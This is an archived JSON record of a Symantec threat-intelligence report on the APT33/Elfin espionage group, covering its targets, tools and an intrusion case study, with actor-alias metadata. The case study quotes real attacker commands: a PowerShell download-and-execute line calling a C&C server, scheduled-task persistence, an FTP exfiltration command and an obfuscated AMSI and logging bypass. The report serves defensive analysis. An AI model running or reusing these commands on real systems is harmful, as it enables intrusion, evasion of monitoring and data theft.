{
	"id": "8eb332cd-aedd-4367-bb11-bd343adb480e",
	"created_at": "2026-04-06T00:09:32.101786Z",
	"updated_at": "2026-04-10T03:34:03.017008Z",
	"deleted_at": null,
	"sha1_hash": "30d5a1c22af2711a79fa2251f523cd2e0b4faa1a",
	"title": "Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71349,
	"plain_text": "Elfin: Relentless Espionage Group Targets Multiple Organizations in\r\nSaudi Arabia and U.S.\r\nArchived: 2026-04-05 16:11:54 UTC\r\nThe Elfin espionage group (aka APT33) has remained highly active over the past three years, attacking at least 50\r\norganizations in Saudi Arabia, the United States, and a range of other countries.\r\nThe group, which first became active in late 2015 or early 2016, specializes in scanning for vulnerable websites and using\r\nthis to identify potential targets, either for attacks or creation of command and control (C\u0026C) infrastructure. It has\r\ncompromised a wide range of targets, including governments along with organizations in the research, chemical,\r\nengineering, manufacturing, consulting, finance, telecoms, and several other sectors.\r\nMany U.S. targets\r\nElfin continues to be focused heavily on Saudi Arabia, which accounted for 42 percent of attacks observed by Symantec\r\nsince the beginning of 2016. However, the U.S. has also been a country of significant interest to the group, with 18\r\norganizations attacked over the past three years, including a number of Fortune 500 companies.\r\nElfin targets in the U.S. have included organizations in the engineering, chemical, research, energy consultancy, finance, IT,\r\nand healthcare sectors.\r\nSome of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks. In one\r\ninstance, a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also\r\ncompromised.\r\nVulnerability exploitation\r\nIn a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in\r\nWinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit\r\nwas used against one target in the chemical sector in Saudi Arabia. 
If successfully exploited on an unpatched computer, the\r\nvulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the\r\ntargeted computer.\r\nTwo users in the targeted organization received a file called \"JobDetails.rar\", which attempted to exploit the WinRAR\r\nvulnerability. This file was likely delivered via a spear-phishing email. However, prior to this attempted attack, Symantec\r\nhad rolled out proactive protection against any attempt to exploit this vulnerability (Exp.CVE-2018-20250). This protection\r\nsuccessfully protected the targeted organization from being compromised.\r\nThe Shamoon connection\r\nElfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks. One Shamoon\r\nvictim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware\r\n(Trojan.Stonedrill) used by Elfin. Because the Elfin and the Shamoon attacks against this organization occurred so close\r\ntogether, there has been speculation that the two groups may be linked. However, Symantec has found no further evidence to\r\nsuggest Elfin was responsible for these Shamoon attacks to date. We continue to monitor the activities of both groups\r\nclosely.\r\nElfin’s toolset\r\nElfin has deployed a wide range of tools in its attacks including custom malware, commodity malware, and open-source\r\nhacking tools.\r\nCustom malware used by the group includes:\r\nNotestuk (Backdoor.Notestuk) (aka TURNEDUP): Malware that can be used to open a backdoor and gather\r\ninformation from a compromised computer.\r\nhttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage\r\nPage 1 of 4\n\nStonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and\r\ndownloading additional files. 
The malware also features a destructive component, which can wipe the master boot\r\nrecord of an infected computer.\r\nAutoIt backdoor: A custom built backdoor written in the AutoIt scripting language.\r\nIn addition to its custom malware, Elfin has also used a number of commodity malware tools, available for purchase on the\r\ncyber underground. These include:\r\nRemcos (Backdoor.Remvio): A commodity remote administration tool (RAT) that can be used to steal information\r\nfrom an infected computer.\r\nDarkComet (Backdoor.Breut): Another commodity RAT used to open a backdoor on an infected computer and steal\r\ninformation.\r\nQuasar RAT (Trojan.Quasar): Commodity RAT that can be used to steal passwords and execute commands on an\r\ninfected computer.\r\nPupy RAT (Backdoor.Patpoopy): Commodity RAT that can open a backdoor on an infected computer.\r\nNanoCore (Trojan.Nancrat): Commodity RAT used to open a backdoor on an infected computer and steal\r\ninformation.\r\nNetWeird (Trojan.Netweird.B): A commodity Trojan which can open a backdoor and steal information from the\r\ncompromised computer. It may also download additional potentially malicious files.\r\nElfin also makes frequent use of a number of publicly available hacking tools, including:\r\nLaZagne (SecurityRisk.LaZagne): A login/password retrieval tool\r\nMimikatz (Hacktool.Mimikatz): Tool designed to steal credentials\r\nGpppassword: Tool used to obtain and decrypt Group Policy Preferences (GPP) passwords\r\nSniffPass (SniffPass): Tool designed to steal passwords by sniffing network traffic\r\nCase study: How an Elfin attack unfolds\r\nIn this section, we describe in detail an Elfin attack on a U.S. organization. On February 12, 2018 at 16:45 (all times are in\r\nthe organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service\r\nprovider. 
The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880.\r\nThe recipient clicked the link and proceeded to download and open a malicious HTML executable file, which in turn loaded\r\ncontent from a C\u0026C server via an embedded iframe. At the same time, code embedded within this file also executed a\r\nPowerShell command to download and execute a copy of chfeeds.vbe from the C\u0026C server.\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX(New-Object\r\nNet.WebClient).DownloadString('hxxps://217.147.168[DOT]46:8088/index.jpg');\r\nA second JavaScript command was also executed, which created a scheduled task to execute chfeeds.vbe multiple times a\r\nday.\r\na.run('%windir%\\\\System32\\\\cmd.exe /c PowerShell -window hidden schtasks.exe /CREATE /SC DAILY /TN \"1\"\r\n/TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 01:00 /f \u0026\u0026 schtasks.exe\r\n/CREATE /SC DAILY /TN \"3\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST\r\n03:00 /f \u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"5\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 05:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"7\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 07:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"9\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 09:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"11\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 11:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"13\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 13:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"15\" /TR 
\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 15:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"17\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 17:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"19\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 19:00 /f\r\n\u0026\u0026 schtasks.exe /CREATE /SC DAILY /TN \"21\" /TR\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 21:00 /f \u0026\u0026 schtasks.exe /CREATE\r\n/SC DAILY /TN \"23\" /TR \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Feeds\\\\chfeeds.vbe\" /ST 23:00 /f ')\r\nThe chfeeds.vbe file acts as a downloader and was used to download a second PowerShell script (registry.ps1). This script in\r\nturn downloaded and executed a PowerShell backdoor known as POSHC2, a proxy-aware C\u0026C framework, from the C\u0026C\r\nserver (hxxps://host-manager.hopto.org). Later at 20:57, the attackers became active on the compromised machine and\r\nproceeded to download the archiving tool WinRAR.\r\n89.34.237.118   808   hxxp://89.34.237[DOT]118:808/Rar32.exe\r\nAt 23:29, the attackers then proceeded to deploy an updated version of their POSHC2 stager.\r\n192.119.15.35   880   hxxp://mynetwork.ddns[DOT]net:880/st-36-p4578.ps1\r\nThis tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13.\r\nTwo days later, on February 14 at 15:12, the attackers returned and installed Quasar RAT onto the infected computer that\r\ncommunicated with a C\u0026C server (217.147.168.123). Quasar RAT was installed to\r\nCSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe.\r\nAt this point, the attackers ceased activity while maintaining access to the network until February 21. 
At 06:38, the attackers\r\nwere observed downloading a custom .NET FTP tool to the infected computer.\r\n192.119.15.36   880   hxxp://192.119.15[DOT]36:880/ftp.exe\r\nLater at 06:56, the attackers exfiltrated data using this FTP tool to a remote host:\r\nJsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f\r\n/[REDACTED] -u [REDACTED] -p [REDACTED]\r\nActivity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom\r\nAutoIt FTP exfiltration tool known as FastUploader from hxxp://192.119.15[DOT]36:880/ftp.exe. This tool was then\r\ninstalled to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe. FastUploader is a custom FTP tool designed to exfiltrate data at a\r\nfaster rate than traditional FTP clients.\r\nAt this point, additional activity from the attackers continued from March 5 into April, and on April 18 at 11:50, a second\r\nremote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start\r\nmenu\\programs\\startup\\smss.exe on the infected computer. 
This was quickly followed 15 seconds later by the installation of\r\na credential dumping tool to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe, and the execution of PowerShell\r\ncommands via PowerShell Empire, a freely available post-exploitation framework, to bypass logging on the infected\r\nmachine.\r\n$GPF=[Ref].AsSeMBLy.GeTTYPe('System.Management.Automation.Utils').\"GEtFiE`LD\"\r\n('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF)\r\n{$GPC=$GPF.GeTVALUE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']\r\n['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']\r\n['EnableScriptBlockInvocationLogging']=0}$vAL=\r\n[COlLecTIons.GEneRic.DIctIoNARy[stRiNG,SyStEM.Object]]::nEw();$VAL.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add\r\n('EnableScriptBlockInvocationLogging',0);$GPC\r\n['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$VaL}ELSe{[SCRIPTBLOck\r\n('signatures','N'+'onPublic,Static').SETVAlue($NuLL,(New-ObjeCt ColLectiONs.GeNERic.HASHSEt[StrInG]))}\r\n[REF].AssemBLy.GetTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%\r\n{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SETValUe($nUll,$TrUE)};\r\nActivity continued throughout April where additional versions of DarkComet, POSHC2 implants, and an AutoIt backdoor\r\nwere deployed along with further credential dumping activities.\r\nActive and agile attacker\r\nElfin is one of the most active groups currently operating in the Middle East, targeting a large number of organizations\r\nacross a diverse range of sectors. 
Over the past three years, the group has utilized a wide array of tools against its victims,\r\nranging from custom built malware to off-the-shelf RATs, indicating a willingness to continually revise its tactics and find\r\nwhatever tools it takes to compromise its next set of victims.\r\nProtection/Mitigation\r\nSymantec has the following protection in place to protect customers against these attacks:\r\nFile-based protection\r\nBackdoor.Notestuk\r\nTrojan.Stonedrill\r\nBackdoor.Remvio\r\nBackdoor.Breut\r\nTrojan.Quasar\r\nBackdoor.Patpoopy\r\nTrojan.Nancrat\r\nTrojan.Netweird.B\r\nExp.CVE-2018-20250\r\nSecurityRisk.LaZagne\r\nHacktool.Mimikatz\r\nSniffPass\r\nThreat intelligence\r\nIn addition to file-based protection, customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence\r\n(MATI) service have received reports on Elfin, which detail methods of detecting and thwarting activities of this group.\r\nSource: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
	],
	"report_names": [
		"elfin-apt33-espionage"
	],
	"threat_actors": [
		{
			"id": "a63c994f-d7d6-4850-a881-730635798b90",
			"created_at": "2025-08-07T02:03:24.788883Z",
			"updated_at": "2026-04-10T02:00:03.785146Z",
			"deleted_at": null,
			"main_name": "COBALT TRINITY",
			"aliases": [
				"APT33 ",
				"Elfin ",
				"HOLMIUM ",
				"MAGNALIUM ",
				"Peach Sandstorm ",
				"Refined Kitten ",
				"TA451 "
			],
			"source_name": "Secureworks:COBALT TRINITY",
			"tools": [
				"AutoCore",
				"Cadlotcorg",
				"Dello RAT",
				"FalseFont",
				"Imminent Monitor",
				"KDALogger",
				"Koadic",
				"NanoCore",
				"NetWire",
				"POWERTON",
				"PoshC2",
				"Poylog",
				"PupyRAT",
				"Schoolbag"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e5ff825b-0456-4013-b90a-971b93def74a",
			"created_at": "2022-10-25T15:50:23.824058Z",
			"updated_at": "2026-04-10T02:00:05.377261Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"APT33",
				"HOLMIUM",
				"Elfin",
				"Peach Sandstorm"
			],
			"source_name": "MITRE:APT33",
			"tools": [
				"PowerSploit",
				"AutoIt backdoor",
				"PoshC2",
				"Mimikatz",
				"NanoCore",
				"DEADWOOD",
				"StoneDrill",
				"POWERTON",
				"LaZagne",
				"TURNEDUP",
				"NETWIRE",
				"Pupy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b938e2e3-3d1b-4b35-a031-ddf25b912557",
			"created_at": "2022-10-25T16:07:23.35582Z",
			"updated_at": "2026-04-10T02:00:04.55531Z",
			"deleted_at": null,
			"main_name": "APT 33",
			"aliases": [
				"APT 33",
				"ATK 35",
				"Cobalt Trinity",
				"Curious Serpens",
				"Elfin",
				"G0064",
				"Holmium",
				"Magnallium",
				"Peach Sandstorm",
				"Refined Kitten",
				"TA451",
				"Yellow Orc"
			],
			"source_name": "ETDA:APT 33",
			"tools": [
				"Atros2.CKPN",
				"AutoIt backdoor",
				"Breut",
				"CinaRAT",
				"DROPSHOT",
				"DarkComet",
				"DarkKomet",
				"DistTrack",
				"EmPyre",
				"EmpireProject",
				"FYNLOS",
				"FalseFont",
				"Filerase",
				"Fynloski",
				"JuicyPotato",
				"Krademok",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"Mimikatz",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"NetWeird",
				"NetWire",
				"NetWire RAT",
				"NetWire RC",
				"NetWired RC",
				"Notestuk",
				"POWERTON",
				"PoshC2",
				"PowerBand",
				"PowerShell Empire",
				"PowerSploit",
				"PsList",
				"Pupy",
				"PupyRAT",
				"Quasar RAT",
				"QuasarRAT",
				"Recam",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"SHAPESHIFT",
				"Shamoon",
				"Socmer",
				"StoneDrill",
				"TURNEDUP",
				"Tickler",
				"Yggdrasil",
				"Zurten",
				"klovbot",
				"pupy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434172,
	"ts_updated_at": 1775792043,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/30d5a1c22af2711a79fa2251f523cd2e0b4faa1a.pdf",
		"text": "https://archive.orkl.eu/30d5a1c22af2711a79fa2251f523cd2e0b4faa1a.txt",
		"img": "https://archive.orkl.eu/30d5a1c22af2711a79fa2251f523cd2e0b4faa1a.jpg"
	}
}